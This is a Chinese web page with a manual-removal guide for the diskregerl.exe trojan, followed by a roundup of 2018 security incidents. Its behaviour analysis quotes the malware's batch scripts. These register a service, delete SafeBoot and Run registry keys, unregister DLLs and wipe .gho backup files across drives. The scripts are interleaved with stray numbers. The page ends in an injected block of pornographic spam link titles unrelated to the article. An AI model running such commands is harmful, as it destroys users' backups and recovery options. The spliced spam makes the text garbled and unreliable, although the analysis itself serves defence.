• <output id="aynwq"><form id="aynwq"><code id="aynwq"></code></form></output>

    <mark id="aynwq"><option id="aynwq"></option></mark>
  • <mark id="aynwq"><option id="aynwq"></option></mark><label id="aynwq"><dl id="aynwq"></dl></label>
  • 學習啦 > 學習電腦 > 電腦安全 > 病毒知識 >

    diskregerl.exe病毒手動查殺教程

    時間: 加城1195 分享

      電腦病毒看不見,卻無處不在,有時防護措施不夠或者不當操作都會導致病毒入侵。有用戶遇到diskregerl.exe(Trojan.Agent.cdt)病毒,那么具體怎么查殺呢?

      方法步驟

      文件名稱:diskregerl.exe 文件大?。?5,056 字節 AV命名:Trojan.Agent.cdt 加殼方式:UPX 編寫語言:VC

      文件MD5:e98a4571cf72b798077d12d6c4894629

      行為分析:

      1、拷貝文件:

      C:\windows\system32\diskregerl.exe 45,056 字節

      2、無添加啟動項舉動。

      3、釋放2個批處理:

      內容分別為:

      22483

      17213

      25187

      6133

      22690

      25373

      date 2004-08-17

      19477

      time 20:00:00

      ping 127.0.0.1 -n 5

      sc.exe create diskregerl BinPath= "C:\windows\system32\diskregerl.exe -kills" type= own type= interact start= auto DisplayName= diskregerl Programnot

      sc.exe description diskregerl 創建網絡連接2

      regsvr32.exe /u /s scrrun.dll

      regsvr32.exe /u /s shimgvw.dll

      regsvr32.exe /u /s itss.dll

      regsvr32.exe /u /s vbscript.dll

      regsvr32.exe /s jscript.dll

      reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F

      reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F

      reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F

      reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F

      reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F

      23413

      sc.exe start diskregerl

      del "C:\WINDOWS\Media\Windows XP 開始.wav"

      del "C:\WINDOWS\Media\Windows XP 信息欄.wav"

      del "C:\WINDOWS\Media\Windows XP 彈出窗口已阻止.wav"

      regsvr32.exe /s C:\windows\system32\Programnot.dll

      ping 127.0.0.1 -n 6

      del "C:\Documents and Settings\孤獨更可靠\桌面\oky.exe" /F

      22483

      17213

      date 2008-04-02

      time 08:21:33

      del %0

      exit

      第二個:

      25187

      6133

      226902537319477

      2819720092

      404

      ping 127.0.0.1 -n 16

      13539

      cmd.exe /c del /f /s /q c:*.gho

      6752

      cmd.exe /c del /f /s /q d:*.gho

      31772

      cmd.exe /c del /f /s /q e:*.gho

      12028

      cmd.exe /c del /f /s /q f:*.gho

      8720

      cmd.exe /c del /f /s /q g:*.gho

      10731

      cmd.exe /c del /f /s /q h:*.gho

      8840

      cmd.exe /c del /f /s /q i:*.gho

      11736

      regsvr32.exe /s C:\windows\system32\Programnot.dll

      del %0

      exit

      4、連接網站,刷流量:

      5、另外該病毒可能惡意鎖定IE主頁,不過未實現。

      解決方法:

      1、重啟計算機。

      2、刪除文件:

      C:\windows\system32\diskregerl.exe

      3、如果重啟后病毒無法刪除,請下載冰刃(該軟件可到down.45it.com下載),結束其進程。

      相關閱讀:2018網絡安全事件:

      一、英特爾處理器曝“Meltdown”和“Spectre漏洞”

      2018年1月,英特爾處理器中曝“Meltdown”(熔斷)和“Spectre” (幽靈)兩大新型漏洞,包括AMD、ARM、英特爾系統和處理器在內,幾乎近20年發售的所有設備都受到影響,受影響的設備包括手機、電腦、服務器以及云計算產品。這些漏洞允許惡意程序從其它程序的內存空間中竊取信息,這意味著包括密碼、帳戶信息、加密密鑰乃至其它一切在理論上可存儲于內存中的信息均可能因此外泄。

      二、GitHub 遭遇大規模 Memcached DDoS 攻擊

      2018年2月,知名代碼托管網站 GitHub 遭遇史上大規模 Memcached DDoS 攻擊,流量峰值高達1.35 Tbps。然而,事情才過去五天,DDoS攻擊再次刷新紀錄,美國一家服務提供商遭遇DDoS 攻擊的峰值創新高,達到1.7 Tbps!攻擊者利用暴露在網上的 Memcached 服務器進行攻擊。網絡安全公司 Cloudflare 的研究人員發現,截止2018年2月底,中國有2.5萬 Memcached 服務器暴露在網上 。

      三、蘋果 iOS iBoot源碼泄露

      2018年2月,開源代碼分享網站 GitHub(軟件項目托管平臺)上有人共享了 iPhone 操作系統的核心組件源碼,泄露的代碼屬于 iOS 安全系統的重要組成部分——iBoot。iBoot 相當于是 Windows 電腦的 BIOS 系統。此次 iBoot 源碼泄露可能讓數以億計的 iOS 設備面臨安全威脅。iOS 與 MacOS 系統開發者 Jonathan Levin 表示,這是 iOS 歷史上最嚴重的一次泄漏事件。

      四、韓國平昌冬季奧運會遭遇黑客攻擊

      2018年2月,韓國平昌冬季奧運會開幕式當天遭遇黑客攻擊,此次攻擊造成網絡中斷,廣播系統(觀眾不能正常觀看直播)和奧運會官網均無法正常運作,許多觀眾無法打印開幕式門票,最終未能正常入場。

      五、加密貨幣采礦軟件攻擊致歐洲廢水處理設施癱瘓

      2018年2月中旬,工業網絡安全企業 Radiflow 公司表示,發現四臺接入歐洲廢水處理設施運營技術網絡的服務器遭遇加密貨幣采礦惡意軟件的入侵。該惡意軟件直接拖垮了廢水處理設備中的 HMI 服務器 CPU,致歐洲廢水處理服務器癱瘓 。

      Radiflow 公司稱,此次事故是加密貨幣惡意軟件首次對關鍵基礎設施運營商的運營技術網絡展開攻擊。由于受感染的服務器為人機交互(簡稱HMI)設備,之所以導致廢水處理系統癱瘓,是因為這種惡意軟件會嚴重降低 HMI 的運行速度。


    病毒手動查殺教程相關文章:

    1.CAD病毒查殺方法教程怎么手動殺毒

    2.如何去深度查殺電腦病毒

    3.電腦怎么全面的查殺病毒

    4.徹底清理刪除電腦病毒的幾種簡單方法

    5.怎么用360安全衛士查殺電腦病毒

    4040023 主站蜘蛛池模板: 女偶像私下的y荡生活| 欧美精品亚洲精品日韩1818 | 2020国产精品永久在线| 最新jizz欧美| 农村老熟妇乱子伦视频| 2021韩国三级理论电影网站 | 免费在线你懂的| 亚洲综合丁香婷婷六月香| 扒开腿狂躁女人爽出白浆| 亚洲精品欧美精品日韩精品| 国产在线播放你懂的| 尾野真知子番号| 亚洲av综合色区无码一区爱av| 美女毛片在线看| 国产精品第9页| 中文字幕亚洲综合久久综合| 欧美日韩一区二区成人午夜电影| 国产免费内射又粗又爽密桃视频 | a毛片免费全部在线播放**| 最近日本中文字幕免费完整| 天天做天天爱天天一爽一毛片| 亚洲av无码一区二区三区国产| 精品综合久久久久久888蜜芽 | 在线天堂中文新版有限公司| 久久国产精品免费一区二区三区| 爱豆传媒在线视频观看网站入口| 国语自产偷拍精品视频偷拍| 久久人妻AV中文字幕| 欧美黑人巨大xxxxxxxx| 国产一级做a爰片...| 5g996未满十八| 成人自拍视频网| 亚洲av无码专区在线播放| 粗大的内捧猛烈进出在线视频| 国产成人综合久久亚洲精品| a在线免费观看视频| 日本免费a视频| 亚洲国产综合人成综合网站00| 精品小视频在线| 国产国产人免费视频成69大陆| 95在线观看精品视频|